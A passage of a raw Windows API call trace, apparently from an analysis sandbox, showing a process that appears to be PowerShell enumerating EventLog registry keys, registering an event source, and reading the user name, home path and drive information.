lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae294*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae290*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.867] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x0, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.867] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x1, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.867] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x2, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.867] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x3, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.867] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x4, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.868] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x5, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.868] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x6, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.868] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x7, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.868] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x8, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.868] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x378) returned 0x0 [0076.868] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.869] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x37c) returned 0x0 [0076.869] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.869] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x380) returned 0x0 [0076.869] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.869] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x384) returned 0x0 [0076.869] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.870] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x388) returned 0x0 [0076.870] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.870] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x38c) returned 0x0 [0076.870] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.870] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x390) returned 0x0 [0076.870] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.871] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x394) returned 0x0 [0076.871] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.871] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x398) returned 0x0 [0076.871] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x39c) returned 0x0 [0076.871] RegCloseKey (hKey=0x39c) returned 0x0 [0076.871] RegCloseKey (hKey=0x32c) returned 0x0 [0076.872] RegCloseKey (hKey=0x398) returned 0x0 [0076.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae22c | out: phkResult=0xae22c*=0x398) returned 0x0 [0076.872] RegQueryInfoKeyW (in: hKey=0x398, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae294, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae290, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae294*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae290*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.872] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x0, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.872] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x1, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.873] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x2, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.873] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x3, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.873] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x4, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.873] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x5, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.873] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x6, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.873] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x7, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.874] RegEnumKeyExW (in: hKey=0x398, dwIndex=0x8, lpName=0x54b630, lpcchName=0xae2b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xae2b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.874] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x32c) returned 0x0 [0076.874] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.874] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x39c) returned 0x0 [0076.874] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.875] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x3a0) returned 0x0 [0076.875] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.875] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x3a4) returned 0x0 [0076.875] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.875] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x3a8) returned 0x0 [0076.876] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.876] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x3ac) returned 0x0 [0076.876] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.876] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x3b0) returned 0x0 [0076.876] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.876] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x3b4) returned 0x0 [0076.877] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x0) returned 0x2 [0076.877] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x3b8) returned 0x0 [0076.877] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae25c | out: phkResult=0xae25c*=0x3bc) returned 0x0 [0076.877] RegCloseKey (hKey=0x3bc) returned 0x0 [0076.877] RegCloseKey (hKey=0x398) returned 0x0 [0076.878] RegCloseKey (hKey=0x3b8) returned 0x0 [0076.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xae220 | out: phkResult=0xae220*=0x3b8) returned 0x0 [0076.878] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xae288, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae284, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xae288*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xae284*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.878] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x0, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.879] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x1, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.879] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x2, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.879] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x3, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.879] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x4, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.879] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x5, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.879] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x6, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.880] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x7, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.880] RegEnumKeyExW (in: hKey=0x3b8, dwIndex=0x8, lpName=0x54b630, lpcchName=0xae2a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xae2a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0076.880] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x398) returned 0x0 [0076.880] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x0) returned 0x2 [0076.880] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3bc) returned 0x0 [0076.880] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x0) returned 0x2 [0076.881] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3c0) returned 0x0 [0076.881] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x0) returned 0x2 [0076.881] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3c4) returned 0x0 [0076.881] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x0) returned 0x2 [0076.881] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3c8) returned 0x0 [0076.882] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x0) returned 0x2 [0076.882] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3cc) returned 0x0 [0076.882] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x0) returned 0x2 [0076.882] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3d0) returned 0x0 [0076.882] RegOpenKeyExW (in: hKey=0x3d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x0) returned 0x2 [0076.883] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3d4) returned 0x0 [0076.883] RegOpenKeyExW (in: hKey=0x3d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x0) returned 0x2 [0076.883] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3d8) returned 0x0 [0076.883] RegOpenKeyExW (in: hKey=0x3d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae250 | out: phkResult=0xae250*=0x3dc) returned 0x0 [0076.883] RegCloseKey (hKey=0x3dc) returned 0x0 [0076.883] RegCloseKey (hKey=0x3b8) returned 0x0 [0076.884] RegCloseKey (hKey=0x3d8) returned 0x0 [0076.889] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4e90004 [0076.895] GetLastError () returned 0x0 [0076.895] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x334eccc*="WSMan", lpRawData=0x334eb74) returned 1 [0076.901] GetLastError () returned 0x0 [0076.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.902] GetLastError () returned 0xcb [0076.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.902] GetLastError () returned 0xcb [0076.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.902] GetLastError () returned 0xcb [0076.903] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae3c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae3c4) returned 0x1 [0076.903] GetLastError () returned 0xcb [0076.903] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae3cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae3cc) returned 1 [0076.904] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3352ba8*="Alias", lpRawData=0x3352a64) returned 1 [0076.904] GetLastError () returned 0x0 [0076.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.905] GetLastError () returned 0xcb [0076.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaddc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.906] GetLastError () returned 0xcb [0076.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.906] GetLastError () returned 0xcb [0076.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadd74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.906] GetLastError () returned 0xcb [0076.906] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x55d940, nSize=0xae3c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xae3c4) returned 0x1 [0076.907] GetLastError () returned 0xcb [0076.907] GetUserNameW (in: lpBuffer=0x54b630, pcbBuffer=0xae3cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xae3cc) returned 1 [0076.907] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3356b3c*="Environment", lpRawData=0x33569f8) returned 1 [0076.908] GetLastError () returned 0x0 [0076.909] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.909] GetLastError () returned 0xcb [0076.909] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0076.909] GetLastError () returned 0xcb [0076.910] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0076.910] GetLastError () returned 0xcb [0076.910] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xadef4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0076.910] GetLastError () returned 0xcb [0076.910] SetErrorMode (uMode=0x1) returned 0x1 [0076.910] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xae374 | out: lpFileInformation=0xae374*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0076.910] GetLastError () returned 0xcb [0076.910] SetErrorMode (uMode=0x1) returned 0x1 [0076.913] GetLogicalDrives () returned 0x4 [0076.913] GetLastError () returned 0xcb [0076.915] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xade18, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0076.915] GetLastError () returned 0xcb [0076.916] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.916] GetLastError () returned 0xcb [0076.916] SetErrorMode (uMode=0x1) returned 0x1 [0076.918] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x54b730, nVolumeNameSize=0x32, 